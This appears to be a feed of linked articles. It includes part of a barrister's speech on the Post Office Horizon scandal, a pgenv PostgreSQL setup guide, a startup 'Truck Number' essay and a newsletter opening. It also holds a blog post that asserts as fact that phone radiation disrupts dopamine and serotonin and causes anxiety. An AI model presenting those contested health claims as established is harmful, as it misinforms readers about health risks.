    The importance of the KEL is impossible to overstate.   The judge found it not to be a red-herring, but, on the contrary, fundamental in revealing the true and full extent of Horizon’s unreliability over time, the bugs identified in the system, their effects on branch Horizon accounts, and the fixes that were implemented.  

    In case you are not already disconcerted, Mrs Misra, on no less than four separate occasions in the course of her prosecution, requested that the court order disclosure by the Post Office of Horizon error records.  

    Three different judges dismissed each of Mrs Misra’s applications.  In the last application, at the end of her trial, her defence counsel submitted that she couldn’t have a fair trial without further disclosure.  The trial judge disagreed and said she could have a fair trial without it.  10 years later the Criminal Cases Review Commission concluded that Mrs Misra didn’t receive a fair trial.  Why? Because she was not given proper disclosure by the Post Office.  

    This ought to be a matter of acute concern to the judiciary, to the legal profession and also to the public.  

    In November 2020 at the personal invitation of the Under Secretary of State, I submitted a paper to the Ministry of Justice contributed to or endorsed by 8 experts, six of whom are, or have been, university professors.  I understand that our recommendations have been submitted for consideration by the Attorney General and by the Chair of the Criminal Procedure Rule Committee, the Lord Chief Justice.

    Second stream of failure - Post Office mendacity

    What I have called the second complicating stream is Post Office mendacity – institutional ethical failure, if you will.   I will give three examples.

    It may come as a surprise to you to know that in September 2010, a month before Mrs Misra’s trial, a significant number of senior employees of Fujitsu and senior employees of the Post Office held a high level meeting at which a bug was discussed called the “Receipts and Payments mismatch” bug.   This bug, it was acknowledged, would cause a postmaster’s receipts and payments to appear to balance at the terminal but not do so on the Post Office’s main servers.   In short, an error caused by this bug would not be apparent or obvious to an operator.  

    It was recorded in writing that this might present a problem for the Post Office in its “ongoing legal cases”. A senior Fujitsu employee and computer engineer who was present at that meeting gave evidence a few weeks later at Mrs Misra’s trial.  He said nothing about it. If you are not deeply shocked by that you ought to be.  Mr Justice Fraser described the bug as having been kept “secret”.  If you have been following me, disclosure of that bug would have undermined statements made by the prosecution, both in opening and closing its case against Seema Misra.  

    I want to tell you briefly about Lee Castleton.  Lee Castleton invested his life savings in acquiring a branch Post Office in in Yorkshire in 2003.   As explained, Fujitsu acquired the Horizon system and provided it to the Post Office.  It was known to have problems with its reliability.

    Recognising the systemic risk that it was shouldering, the Post Office with its lawyers devised an extremely adverse contract that shifted the risk in the system to postmasters.  This was achieved by a contractual term that provided that a Horizon account balance stated by a postmaster to the Post Office was an “account” in law.  An “account” is analogous to acknowledgement of a debt due.   The legal effect is that once stated, the burden is on the paying party, if they want to dispute the account for any reason, to show why the account is wrong.  The postmaster was contractually required to make up, out of their own funds, any shortfall.  If a postmaster’s account was wrong, not by any fault of theirs but because the system had failed, as a matter of contract it was down to the postmaster concerned to show and explain why.

    That presented the hapless postmaster with an insuperable evidential and legal problem.  

    The first occasion on which the Post Office was required to positively prove that the Horizon system worked properly was in 2019.  It then failed dismally.   The trial judge described the Post Office’s contentions that Horizon was robust and reliable as the 21st century equivalent of maintaining that the earth is flat.  

    In 2006 Lee Castleton was sued for a shortfall shown at his Horizon terminal of about £26,000.  He was careful and knew he had not made mistakes. 

    Mr Castleton was unrepresented by lawyers at his 6-day trial in 2006.  He had run out of money to pay for legal representation.  He had called the Horizon helpline many, many times, complaining that he had problems balancing his accounts.  That cut no ice with either the Post Office or with the judge.  Mr Castleton was persuaded to accept that the balance that he had provided to the Post Office was in law “an account”.  He accepted that at the outset of the trial.  He was doomed from the word go.

    In law, the essential feature of an account is that it is the result of agreement.  It took 13 years for Mr Castleton’s concession to be shown by Mr Justice Fraser in 2019 to have been wrongly made. That is because there was no agreement of the account. There was no contractual mechanism for disputing the Horizon computer figure.  The contractual term was, in effect ‘agree the Horizon figure or stop operating your Post Office’.  Neat, but utterly unreasonable and oppressive.  

    The contractual provision had the purported legal effect of transferring the risk of Horizon failure to hapless postmasters.  It is unsatisfactory that for 20 years it went unexamined.  Most postmasters could never have afforded to instruct a barrister of sufficient experience to challenge the Post Office.  Lee went like a lamb to the slaughter.

    The trial judge, without hearing any expert evidence, rejected Mr Castleton’s defence that the Horizon system might not have been working properly.  The judge concluded that it was working properly.  You may ask yourself how he arrived at that conclusion.  You will remain mystified if you take the trouble to read the judge’s judgment: Post Office Ltd v Castleton [2007] EWHC 5 QB.

    (https://www.bailii.org/ew/cases/EWHC/QB/2007/5.html.)

    The Post Office obtained a costs order against Mr Castleton for £321,000. 

    The costs order made against him caused Lee Castleton to become bankrupt.  For several years he and his family were rendered almost destitute. They lived in accommodation without a hot water boiler because he could not afford one.  Ask yourself how many postmasters the Post Office’s solicitors will have shown that hopelessly flawed reported High Court judgment to, to make them think twice before taking on the Post Office.  

    The judgment in Mr  Castleton’s case is now shown to be wrong in virtually every respect, both as to the law and as to its facts.  I have written about that decision in an article entitled ‘The Harm that judges do’.    

    The third aspect of ethical failure by the Post Office is what can be called, “the cover-up”.

    In October 2020, in one document amongst the many thousands I had looked at, I noticed a remarkable couple of lines that referred to the Post Office main Board, in August 2013, having been told by external solicitors, about concerns about the Fujitsu computer engineer who had given evidence at Mrs Misra’s trial.   I could not for the life of me understand why the Board of the Post Office was receiving notice about one of its expert witnesses.  

    My solicitors Aria Grace Law asked a large number of questions about this. These elicited from the Post Office in November 2020 the now famous “Clarke Advice”.  That document revealed that, as long ago as in 2013, the Post Office knew that its principal expert witness had repeatedly given incomplete and misleading evidence to the court. He had thereby put the Post Office in breach of its obligations to the court as prosecutor.  It was suggested he should not be used as a witness again.  It is the single most explosive document I have encountered in 30 years’ practice at the Bar.  

    One of the extraordinary aspects of the Clarke Advice, is that it revealed a curious difference.  If you read the judgments of Mr Justice Fraser, you will see that he devotes a good deal of space to the remarkable fact that a Fujitsu expert computer engineer, Mr Jenkins, was the source of much of the Post Office’s evidence in 2019.  But he was not called as a witness.  In their written submissions at the close of the Horizon Issues trial the Post Office gave an explanation for Mr Jenkins not being called as a witness.   The remarkable thing is, that the reason given to Mr Justice Fraser in 2019 by the Post Office is rather different from, and does not sit easily with, an alternative explanation, as suggested by the Clarke Advice.  If you are interested you can pursue this by considering the Court of Appeal’s judgment of April 2021 and the judgment of Mr Justice Fraser of December 2019.

    The main point, however, is that in my view, any reasonably competent and conscientious lawyer in 2013, in possession of that information – that is to say the known incompleteness of evidence given to the court by their expert - would immediately have grasped that it could potentially render the conviction of a person, convicted on the basis of evidence given by that Fujitsu employee, unsafe. A prosecutor in the possession of such information has an unqualified duty in law to disclose it to a convicted defendant. 

    I had been puzzled, until November 2020, as to why, from 2014, the Post Office had not undertaken any prosecutions of postmasters, when in 2012 it had undertaken more than 40. The Clarke Advice provided my answer. The Post Office in 2013-2014 undertook a major change in its policy.  But it was keeping quiet about the reason.

    A question to whet your appetite

    I will leave you with a question.  The key is timing, so keep in mind the dates.

    On 17 December 2014 there was an adjournment debate in Westminster Hall moved by Mr James Arbuthnot MP, now Lord Arbuthnot.  (An adjournment debate is a debate without a vote. Such debates are usually on subjects of general public importance.) Second Sight Ltd, a specialist firm of forensic accountants, in response to pressure from Members of Parliament, had two years previously been appointed by the Post Office to look into the Post Office’s treatment of its postmasters.  Sir Anthony Hooper, a former Court of Appeal judge, had been appointed to oversee a mediation process.

    At the December 2014 debate, Jo Swinson MP, then the government minister for Postal Services, having heard from MPs a series of shocking stories of the treatment by the Post Office of its postmasters, said this to Parliament:

    “…in such a situation what I would normally propose doing is to get a team of forensic accountants to go through every scenario and to have the report looked at by someone independent, such as a former Court of Appeal judge. We have a system in place to look at cases … If any information comes to light during the course of the mediation or the investigations, that suggests that any of the convictions that have taken place are unsafe, there is a legal duty for that information to be disclosed…. I fail to see how action can be taken without properly looking in detail at every single one of the cases through exactly the kind of scheme that we have set up... . We have to look at the details and the facts, and that has to be done forensically. That is why Second Sight, the team of forensic accountants, has been employed and why we have someone of the calibre of Sir Anthony Hooper to oversee the process.”

    In 2015, the Post Office told Parliament that it had received no evidence that the conviction of any applicant to the mediation scheme was unsafe.  Lord Arbuthnot is on record in 2020 as stating that the Post Office lied to Parliament.  To my knowledge he has not been contradicted.

    Be that as it may, less than 6 weeks’ after the minister’s statement to Parliament, on 3 February 2015,  Ian Henderson of Second Sight gave this evidence to the Business Innovation and Skills Parliamentary Select Committee:

    Ian Henderson  “we have seen no evidence that the Post Office’s own investigators were ever trained or prepared to consider that Horizon was at fault. That was never a factor that was taken into account in any of the investigations by Post Office that we have looked at.”

    “That is a matter of huge concern, and that is why we are determined to get to the bottom of this matter, because we think that there have been prosecutions brought by the Post Office where there has been inadequate investigation and inadequate evidence to support some of the charges brought against defendants … this … is why we need to see the full prosecution files.”

    “When we have looked at the evidence made available to us… I have not been satisfied that there is sufficient evidence to support a charge for theft. You can imagine the consequences that flow from that. That is why we, Second Sight, are determined to get to the bottom of this matter, which we regard as extremely serious.”  

    So Ian Henderson in February 2015 said that Second Sight wanted to do exactly what Jo Swinson MP, the government minister, in December 2014 had said the government saw to be necessary. 

    Within a month of Mr Henderson’s evidence to the Select Committee, in March 2015 the Post Office summarily terminated the engagement of Second Sight and abruptly withdrew from the mediation process.  

    I raise this question for you to reflect upon.  Given what the minister had told Parliament on 17 December 2014, is it plausible that the Post Office sacked Second Sight without briefing the government, as its owner, on the reason for it doing so?  I think it inconceivable that it did not. 

    Assuming the Post Office did brief the government on those reasons, the Post Office either gave a truthful account of the reason for sacking Second Sight and withdrawing from mediation, or else it gave an incomplete and misleading explanation.    

    If the Post Office gave a truthful explanation to the government, that would make the government complicit in a 6 year cover-up. On the other hand, if the Post Office gave a misleading explanation to government, why has there not been the slightest suggestion of this from the government, given the seismic shocks represented by Mr Justice Fraser’s judgment of December 2019 and, even more so, the Court of Appeal’s devastating judgment of 23 April 2021?  

    These are very big and important questions.  Until now, I do not believe that they have been raised.

    These questions are not academic.  The Post Office’s behaviour has destroyed peoples’ lives.  I have provided the links to two podcasts by The Guardian newspaper on my former client Janet Skinner’s experience.  That her story reduced the journalist interviewing her to tears says enough.  

    You might weep too, but weep for English justice.  

    © Paul Marshall June 2021

    Cornerstone Barristers

    2-3 Gray’s Inn Square

    Gray’s Inn, London

    Further reading: 

    Hamilton and ors. v Post Office Ltd [2021] EWCA Crim 577. https://www.bailii.org/ew/cases/EWCA/Crim/2021/577.html

    Bates and ors. v Post Office Ltd (‘Horizon Issues’) Rev 1 [2019] EWHC 3408 QB. https://www.bailii.org/ew/cases/EWHC/QB/2019/3408.html

    Bates and ors. v Post Office Ltd (‘Common Issues’) [2019] EWHC 606 QB. https://www.bailii.org/ew/cases/EWHC/QB/2019/606.html

    Post Office Ltd v Castleton [2007] EWHC 5 QB. https://www.bailii.org/ew/cases/EWHC/QB/2007/5.html

    The harm that judges do – misunderstanding computer evidence: Mr Castleton’s story, Paul Marshall, Digital Evidence and Electronic Signature Law Review 17 (2020) 25. https://journals.sas.ac.uk/deeslr/article/view/5172/5037

    English law’s presumption that computer systems are reliable: time for a rethink? Paul Marshall, Butterworths Journal of International Banking and Financial Law, 7 (2020) 433.

    Recommendations for the probity of computer evidence, Marshall, Christie, Ladkin, Littlewood, Mason, Newby, Rogers, Thimbleby, Thomas,  Digital Evidence and Electronic Signature Law Review 18 (2021) 18. https://journals.sas.ac.uk/deeslr/article/view/5240/5083

    The Law Commission presumption concerning the dependability of computer evidence, Ladkin, Littlewood, Thimbleby, Thomas, Digital Evidence and Electronic Signature Law Review 17 (2020) 1. https://journals.sas.ac.uk/deeslr/article/view/5143

    Stephen Mason and Daniel Seng (Eds.) Electronic Evidence 4th Edition, Institute of Advanced Legal Studies for the SAS Humanities Digital Library, School of Advanced Study University of London 2017, https://humanities-digital-library.org/index.php/hdl/catalog/book/electronicevidence (5th edition forthcoming 2021).

    Robustness of software’, Peter Ladkin, Digital Evidence and Electronic Signature Law Review 17 (2020) 15. https://journals.sas.ac.uk/deeslr/article/view/5171.

    The Hearsay Rule in Civil Proceedings 1993 Law Com. No. 245.

    Evidence in Criminal Proceedings Hearsay and Related Topics 1997 Law Com. No. 216.

    The Guardian Podcasts on Janet Skinner’s experience, by Anushka Asthana and Richard Brooks.

    https://www.theguardian.com/news/audio/2021/may/10/exposing-the-great-post-office-scandal-part-1

    https://www.theguardian.com/news/audio/2021/may/11/the-post-office-scandal-part-2

    BBC Radio 4, 11-part Podcast by Nick Wallis, The Great Post Office trial https://www.bbc.co.uk/programmes/m000jf7j/episodes/downloads

    ]]>
    https://www.postofficetrial.com/2021/06/marshall-spells-it-out-speech-to.html hacker-news-small-sites-43220322 Sat, 01 Mar 2025 15:42:02 GMT
    <![CDATA[PostgreSQL Version Managers]]> thread link) | @chmaynard
    March 1, 2025 | https://alchemists.io/articles/postgres_version_managers | archive.org

    Cover

    PostgreSQL Version Managers

    The ability to manage multiple PostgreSQL versions, similar to using Ruby Version Managers, is handy for client work, different applications using different databases, and so forth. Using a version manager also allows you to install the latest version of PostgreSQL without having to wait for a platform build which saves you time and allows you to work unhindered. This is a super power.

    One way to manage multiple PostgreSQL versions is to use Homebrew but this can be slow since you have to wait for Homebrew to catch up to recent PostgreSQL releases. Additionally, switching between different versions, using Homebrew, is much more cumbersome and requires effort.

    This is where pgenv comes into play which solves these ailments. We’ll look at how to install, setup, and use pgenv so you can install and manage multiple PostgreSQL versions as desired.

    Install

    To get started, you’ll want to use a XDG configuration in order to keep your Dotfiles clean. pgenv doesn’t support XDG by default, which is unfortunate, but we can make this work by installing as follows:

    git clone https://github.com/theory/pgenv $HOME/.cache/pgenv

    We’re using the XDG cache folder because pgenv will build and install different PostgreSQL versions within the pgenv folder. Some of the configuration will go here too, despite being slightly awkward, because pgenv doesn’t provide a way to place the configuration within your XDG config (i.e. $HOME/.config/pgenv).

    Setup

    Once pgenv is installed, you’ll need to teach your shell where to find pgenv. I use Bash but you can adopt to your specific shell. Assuming you’re using Bash, you only need the following to your .bashrc:

    # Necessary to use the XDG cache.
    export PGENV_ROOT="$HOME/.cache/pgenv"
    
    # Necessary to ensure `pgenv` and all PostgreSQL CLIs are on your path.
    export PATH="$HOME/.cache/pgenv/bin:$HOME/.cache/pgenv/pgsql/bin:$PATH"

    With the above in place, you’ll be able to run pgenv. The PostgreSQL CLIs won’t be available until you install a version (more on this soon).

    Configuration

    With pgenv setup, you need to apply a default configuration by running the following:

    This’ll create a default $HOME/.cache/pgenv/config/default.conf file. I won’t detail all of what’s in this file since the generated documentation is self-describing but you’ll need to customize further especially if you want SSL and UUID support. Here are the changes you’ll want to apply:

    # Configure PostgreSQL build flags.
    PGENV_CONFIGURE_OPTIONS=(
      --enable-thread-safety
      --with-bonjour
      --with-llvm
      --with-openssl
      --with-uuid=e2fs
      PKG_CONFIG_PATH=$HOMEBREW_PREFIX/opt/icu4c@76/lib/pkgconfig
      LLVM_CONFIG=$HOMEBREW_PREFIX/opt/llvm/bin/llvm-config
      CLANG=$HOMEBREW_PREFIX/opt/llvm/bin/clang
      "CPPFLAGS=-I$HOMEBREW_PREFIX/opt/icu4c/include -I$HOMEBREW_PREFIX/opt/openssl/include -I$HOMEBREW_PREFIX/opt/readline/include"
      "CFLAGS=-I$HOMEBREW_PREFIX/opt/icu4c/include -I$HOMEBREW_PREFIX/opt/openssl/include -I$HOMEBREW_PREFIX/opt/readline/include"
      "LDFLAGS=-L$HOMEBREW_PREFIX/opt/icu4c/lib -L$HOMEBREW_PREFIX/opt/openssl/lib -L$HOMEBREW_PREFIX/opt/readline/lib"
    )
    
    # Path to the log file (must match your XDG cache path).
    export PGENV_LOG="$HOME/.cache/pgenv/pgsql/data/server.log"
    
    # Script to execute when initdb finishes (and the server has not started yet).
    export PGENV_SCRIPT_FIRSTSTART="$HOME/.config/pgenv/initialize"
    
    # Ensures configuration is preserved.
    export PGENV_WRITE_CONFIGURATION_FILE_AUTOMATICALLY=no

    The PGENV_CONFIGURE_OPTIONS variable is the most important and must not be preceded by an export statement or the options won’t be applied. Here’s the break down from top to bottom:

    • --enable-thread-safety: Ensures client libraries can make thread-safe concurrent connections.

    • --with-bonjour: Handy for macOS environments by allowing PostgreSQL servers to advertise their presence on the network, making it easier for clients to discover and connect to available PostgreSQL instances.

    • --with-llvm: Enables support for LLVM-based Just-In-Time (JIT) compilation which enhances query performance by allowing PostgreSQL to compile frequently executed code into machine-specific optimized instructions at runtime.

    • --with-openssl: Enables secure connections using OpenSSL.

    • --with-uuid=e2fs: Enables UUID support for primary keys and allows you to run migrations which enable UUIDs. Example enable_extension "uuid-ossp".

    • PKG_CONFIG_PATH: Ensures you have unicode support as installed and managed by Homebrew (see icu4c for details). 💡 This means you’ll need to update the version from time to time when a new version of icu4c drops.

    • LLVM_CONFIG and CLANG: Ensures LLVM is configured as installed and managed by Homebrew.

    • CPPFLAGS, CFLAGS, LDFLAGS: All of these build flags are necessary to build PostgreSQL with unicode, OpenSSL, and readline support.

    The PGENV_LOG variable must point to your XDG cache location. Otherwise, you’ll not be able to start PostgreSQL.

    The PGENV_SCRIPT_FIRSTSTART variable allows you to run custom code once a specific PostgreSQL version has been installed and used for the first time (i.e. pgenv use <version>). This is handy for automating additional setup after the database has been initialized and the server started. For example, here’s what I’m using:

    #! /usr/bin/env bash
    
    set -o nounset
    set -o errexit
    set -o pipefail
    IFS=$'\n\t'
    
    psql --username postgres \
         --command "CREATE ROLE $USER WITH SUPERUSER CREATEDB CREATEROLE LOGIN PASSWORD '';"
    psql --username postgres --command "CREATE DATABASE $USER;"
    
    (
      cd "$HOME/.cache/pgenv/pgsql/data"
    
      if [[ ! -e "server.key" && ! -e "server.crt" ]]; then
        openssl req -new \
                    -x509 \
                    -days 365 \
                    -nodes \
                    -text \
                    -out server.crt \
                    -keyout server.key \
                    -subj "/CN=postgres"
    
        chmod 0600 server.key
      fi
    )
    
    psql -c "ALTER SYSTEM SET ssl = 'on';"
    psql -c "ALTER SYSTEM SET ssl_cert_file = 'server.crt';"
    psql -c "ALTER SYSTEM SET ssl_key_file = 'server.key';"
    psql -c "ALTER SYSTEM SET ssl_min_protocol_version = 'TLSv1.3';"
    
    pgenv restart

    The above performs the following steps:

    1. Configures Bash for strict use.

    2. Ensures the current user (i.e. $USER) is created with the ability to manage databases.

    3. Creates a local SSL key and certificate but only if they don’t exist.

    4. Enables SSL support.

    5. Restarts the server to pick up the changes.

    You can customize further as desired but all of this will ensure you can immediately build, install, and use a PostgreSQL version.

    Lastly, the PGENV_WRITE_CONFIGURATION_FILE_AUTOMATICALLY is critical to prevent your configuration from being overwritten each time you remove or install the same and/or different version of PostgreSQL.

    With this default configuration in place, you now have a foundation for installing multiple versions because they’ll inherit from this default. To provide specialized configurations for different versions, you can use pgenv config <command> <version>. For example, when pgenv config init was used above, that created the default configuration but if you want to start configuring a specific version, you’d use: pgenv config init 16.0.

    Workflow

    With all of the above in place, installing and using a PostgreSQL version is as simple as:

    pgenv build 17.0
    pgenv use 17.0

    You can also check that SSL is enabled and your extensions are available:

    # Check if SSL is enabled.
    psql -c "SHOW ssl;"
    
    # Check available extensions.
    psql -c "SELECT * FROM pg_available_extensions;"

    Resources

    If you’d like to see how I manage and configure all of this, check out these projects:

    • Dotfiles: Used to maintain my Bash aliases, functions, configuration, and more.

    • macOS Configuration: Used to install and manage all software. Perfect for managing existing hardware or automating the setup of a brand new machine with a fully functional working development environment.

    Troubleshooting

    • If you get install errors due to an updated or outdated icu4c, make sure you update your PKG_CONFIG_PATH to point to the latest icu4c version.

    • If you have trouble installed the pg gem due to reinstalling PostgreSQL, installing a different version, etc. then uninstall (i.e. gem uninstall pg) and install (i.e. gem install pg) to pick up the latest changes.

    Recap

    You’ve learned how to install, configure, and use pgenv for managing multiple PostgreSQL versions. You’ve also learned how customize pgenv so you can immediately create and use databases which pgenv doesn’t provide documentation for. This should make your workflow easier while also allowing you to more easily migrate to newer versions of PostgreSQL. Enjoy!

    ]]>
    https://alchemists.io/articles/postgres_version_managers hacker-news-small-sites-43219662 Sat, 01 Mar 2025 14:44:40 GMT
    <![CDATA[Hooked on Your Phone? The Science Behind Addiction and Anxiety]]> thread link) | @claudiasin
    March 1, 2025 | https://www.sciencex.cc/blog-posts/why-do-we-feel-addicted-or-anxious-with-our-mobile-phones | archive.org

    Why can’t we put our phones down? And why does being without them make us so uneasy? Discover how neuroscience uncovers the surprising roles of neurotransmitters, electromagnetic radiation (EMR), and pulsed electromagnetic radiation (PEMR) in shaping our emotions and habits. 📡 Dive into the fascinating science behind your phone addiction!

    Claudia HC Sin

    Founder & Host at ScienceX, Business owner of ChatCampaign Research Lab

    The Neuroscience of Mobile Phone Addiction

    1. Dopamine and Reward Pathways

    When you check your phone for notifications, social media updates, or messages, your brain releases dopamine, the neurotransmitter responsible for pleasure and reward. This creates a "dopamine loop," where every notification reinforces the habit of checking your phone. Over time, this can lead to compulsive behavior, similar to other forms of addiction (Check: 《Irresistible: The Rise of Addictive Technology and the Business of Keeping Us Hooked》). 📲✨

    However, electromagnetic radiation (EMR) from mobile phones may also play a role. EMR is just radiation in common terms—your phone uses electromagnetic waves to communicate with cell towers or repeaters in buildings far away, and that's radiation already.

    Full spectrum of electromagnetic wave

    Mobile phones rely on Electromagnetic Wave to function, and with the evolution of technology, the frequency range has expanded. For example:

    • 2G-4G networks primarily use radio frequencies between 700 MHz and 2.6 GHz.
    • 5G networks touch on the microwave frequency spectrum, operating in both mid-band frequencies (1 GHz to 6 GHz) and high-band millimeter waves (24 GHz to 40 GHz).

    Research indicates that long-term exposure to EMR, particularly radiofrequency electromagnetic fields (RF-EMFs), can disrupt dopamine metabolism in the brain. A study published in Frontiers in Public Health found that prolonged RF-EMF exposure reduced dopamine levels in the hippocampus, a brain region critical for learning and memory (Hu et al., 2021). Lower dopamine levels in this region may contribute to cognitive impairments and emotional dysregulation. 🧠

    Several studies reported the effects of EMR on DA(Dopamine). For example, adult rats undergoing daily EMR exposure for 1 h, with an EMR frequency of 1,800 MHz, a specific absorption rate (SAR) value of 0.843 W/kg, power density of 0.02 mW/cm2, induced a significant decrease in DA in the hippocampus after 2 months of exposure and 1 month after cessation of exposure. This study indicated that EMR exposure may reduce DA production in the hippocampus, affect rat arousal, and contribute to decreased learning and memory ability after exposure to EMR

    2. Anxiety and Serotonin Dysregulation

    Beyond addiction, mobile phones can also trigger anxiety. Neuroscience suggests that serotonin (5-HT), the neurotransmitter associated with mood regulation, may be affected by mobile phone use.

    • Research on pulsed electromagnetic radiation (PEMR) highlights that exposure can alter serotonin turnover(how quickly serotonin is produced, released, used, and then broken down) in the brain. Increased serotonin turnover rates have been linked to mood swings, anxiety, and disrupted sleep patterns (Hu et al., 2021).
      • If serotonin turnover is too fast or too slow, it can lead to imbalances in serotonin levels. These imbalances affect mood regulation, causing unpredictable mood swings (e.g., feeling happy one moment and irritable the next).
      • Low serotonin levels or irregular turnover can heighten the brain's response to stress, leading to anxiety. Serotonin plays a calming role, so disruptions in its turnover can make it harder to feel relaxed and manage stress.
      • Serotonin is a precursor to melatonin, a hormone that regulates sleep.
    • Another study on rats demonstrated that PEMR exposure caused significant changes in serotonin levels, which were associated with anxiety-like behaviors (ResearchGate study).

    3. Electromagnetic Fields and Cognitive Stress

    Mobile phones emit electromagnetic fields (EMFs), which can affect brain function. Studies show that EMF exposure may lead to oxidative stress, calcium ion dysregulation, and neurotransmitter imbalances:

    • Oxidative Stress: EMFs generate reactive oxygen species (ROS), which damage neurons and disrupt neurotransmitter metabolism (Hu et al., 2021).
    • Calcium Dysregulation: EMFs alter the activity of voltage-gated calcium channels (VGCCs), increasing intracellular calcium levels. This disrupts synaptic transmission and can contribute to anxiety (Pall, 2013).
    • Cognitive Changes: EMF exposure has been linked to impairments in learning, memory, and emotional regulation. Researchers found that long-term exposure to mobile phone radiation affected glutamate (an excitatory neurotransmitter) and GABA (an inhibitory neurotransmitter), disrupting the brain's excitatory-inhibitory balance (Hu et al., 2021).

    The Anxiety-Addiction Cycle

    The combination of dopamine-driven reward mechanisms and EMF-induced neurotransmitter imbalances creates a vicious cycle:

    1. Compulsion: Dopamine release from notifications reinforces frequent phone use.
    2. Anxiety: Being separated from your phone disrupts serotonin balance, causing stress.
    3. Cognitive Overload: Continuous EMF exposure disrupts neurotransmitter balance, impairing memory and decision-making.

    This cycle explains why we feel both addicted to and anxious without our phones. 📉

    Practical Tips to Break the Cycle

    To reduce the impact of mobile phone addiction and EMF exposure:

    • Set Boundaries: Limit screen time and designate "phone-free" periods during the day.
    • Sleep Hygiene: Avoid using your phone before bed to prevent EMF-induced sleep disturbances.
    • EMF Mitigation: Use headphones or speakerphone to minimize direct exposure to your head.

    Conclusion

    Our relationship with mobile phones is deeply intertwined with neuroscience. The interplay between dopamine, serotonin, and EMF exposure sheds light on why we feel addicted and anxious. While mobile phones are indispensable in modern life, understanding their impact on the brain can help us use them more mindfully. 🌐

    References

    1. Hu, C., Zuo, H., & Li, Y. (2021). Effects of Radiofrequency Electromagnetic Radiation on Neurotransmitters in the Brain. Frontiers in Public Health. Read here
    2. Aboul Ezz, H.S., et al. (2013). The effect of pulsed electromagnetic radiation from mobile phones on the levels of monoamine neurotransmitters in four different areas of the rat brain. ResearchGate. Read here
    3. Pall, M. L. (2013). Electromagnetic fields act via activation of voltage-gated calcium channels to produce beneficial or adverse effects. Journal of Cellular and Molecular Medicine, 17(8), 958–965. DOI: 10.1111/jcmm.12088

    All opinions and advice in this blog post are solely those of the author and do not reflect the views of the platform or any collaboration partners.

    🌌 The Map of Physics: Where Size and Speed Define Reality 🌟

    From the motion of planets to the mysteries of subatomic particles, explore how the universe changes depending on scale and velocity—and uncover the fascinating principles that govern it all. 🌌✨

    Get Started

    🌌✨ How 150 Years of Science Transformed Humanity Forever 🌍🔬

    From Einstein to AI: How Two Eras of Science Shaped Our World (1870–1945 vs. 1945–2020)

    Get Started

    Hooked on Your Phone? The Science Behind Addiction and Anxiety 🤳🧠

    Why can’t we put our phones down? And why does being without them make us so uneasy? Discover how neuroscience uncovers the surprising roles of neurotransmitters, electromagnetic radiation (EMR), and pulsed electromagnetic radiation (PEMR) in shaping our emotions and habits. 📡 Dive into the fascinating science behind your phone addiction!

    Get Started

    Intuition in Decision-Making: Good or Bad? 🤔

    When should we trust our intuition, and when does it lead us astray? Scientists tell this in their research paper...

    Get Started

    How Gut Microbiota Influence Your Life 🦠🌱

    Your gut microbiota—trillions of bacteria, fungi, and other microbes in your GI tract(or gastrointestinal tract, which means gut)—play a vital role in your health + mental health, influencing digestion, immunity, and even brain function.

    Get Started

    Mindreading, Brain Entrainment, Remote Communication, and Neuromodulation: No Longer Science Fiction

    Imagine a world where your thoughts can be decoded, your consciousness influenced, and communication happens without a single word spoken aloud. This isn’t a dystopian episode of Black Mirror.

    Get Started

    What is Man-Made Remote Telepathy and How Far Are We From It? 🤔🧠💡

    The concept of remote telepathy—direct communication between minds—has long been a staple of science fiction. But how close are we to making it a reality using modern neuroscience? 🧬

    Get Started

    ]]>
    https://www.sciencex.cc/blog-posts/why-do-we-feel-addicted-or-anxious-with-our-mobile-phones hacker-news-small-sites-43219339 Sat, 01 Mar 2025 14:05:27 GMT
    <![CDATA[Why your startup's Truck Number might be lower than you think]]> thread link) | @gkedzierski
    March 1, 2025 | https://gregkedzierski.com/essays/truck-number/ | archive.org

    • startups
    • management

    In software engineering, the Truck Number (also known as the Bus Factor) measures how many key people can leave before a project is in serious trouble. A Truck Number of 1 means a single person holds critical knowledge - if they disappear, everything grinds to a halt. In startups, where teams are small and highly specialized, this risk is even greater. Founders, lead engineers, and early employees often accumulate institutional knowledge that isn’t written down, making them single points of failure.

    Startups, by their nature, push for speed over redundancy. A lean team is efficient but fragile. If only one developer understands the core architecture, or a single data scientist fine-tunes the AI model, losing them could be catastrophic. Documentation and cross-training take time, and when shipping features is the priority, those practices are often overlooked. But when the inevitable happens - whether through burnout, new job offers, or personal emergencies—the team scrambles to recover lost expertise.

    AI has added a new dimension to the Truck Number problem. Many machine learning models are developed by a handful of experts who understand not just the code but the reasoning behind the training data, hyperparameters, and trade-offs. Unlike traditional software, AI models are often difficult to interpret, making it even harder for a new engineer to step in. A startup’s AI pipeline might rely on a single person who built it, meaning the Truck Number is effectively 1. Worse, if the model is undocumented or trained on proprietary data, even a new hire may struggle to replicate previous work.

    Ironically, AI itself might help mitigate this issue. Code-generation tools like GitHub Copilot and AI-assisted documentation tools can reduce dependency on any one individual by making code more accessible. Startups can also use AI to automate repetitive tasks, freeing up senior engineers to focus on knowledge-sharing. However, these tools are no replacement for a strong engineering culture that values redundancy, shared ownership, and clear documentation.

    Ultimately, a high Truck Number should be a deliberate goal, not a happy accident. Regular knowledge-sharing sessions, better documentation practices, and pairing junior developers with experienced team members all contribute to long-term sustainability. In startups and AI-driven teams, where innovation moves fast and talent is scarce, the ability to continue without any single person is a competitive advantage. If your Truck Number is too low, it's not just a risk - it’s a ticking time bomb.


    PS. If you liked this article, please share to spread the word.

    Looking for a handy server monitoring tool?

    Check out StackScout, a project I've been working on for the past few years. It's a user-friendly web app that keeps an eye on your servers across different clouds and data centers. With StackScout, you can set custom alerts, access informative reports, and use some neat analytics tools. Feel free to give it a spin and let me know what you think!

    Learn more about StackScout

    StackScout server monitoring tool screenshot

    Hand-crafted with
    All rights reserved.

    ]]>
    https://gregkedzierski.com/essays/truck-number/ hacker-news-small-sites-43219315 Sat, 01 Mar 2025 14:02:27 GMT
    <![CDATA[AI-assisted creativity and the race to claim the future]]> thread link) | @Kye
    March 1, 2025 | https://kyefox.com/ai-assisted-creativity/ | archive.org

    Newsletter

    In this issue we grab the future by its shiny metal cranium and hold on for dear life while we look for the control panel.

    Generative AI, when used effectively, isn't about replacing creativity. Instead, it can help you identify patterns and create frameworks based on your existing work. But the conversation around AI is often dominated by powerful voices that risk steering us toward a future we don't want. That's why it's crucial for creatives to take control of these tools.

    • For Writers: LLMs can help identify overused phrases, pacing issues, or inconsistencies in character voice – creating frameworks for self-editing checklists.
